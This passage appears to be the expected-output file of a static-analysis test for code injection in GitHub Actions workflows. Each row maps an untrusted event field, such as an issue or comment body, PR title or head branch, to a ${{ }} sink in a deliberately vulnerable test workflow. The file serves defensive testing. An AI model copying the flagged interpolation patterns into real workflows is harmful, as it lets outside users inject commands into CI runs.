| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | -| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 
'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | -| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | -| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | pull_request_review_comment | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | pull_request_target | -| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | issue_comment | -| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test2.yml:27:26:27:66 | 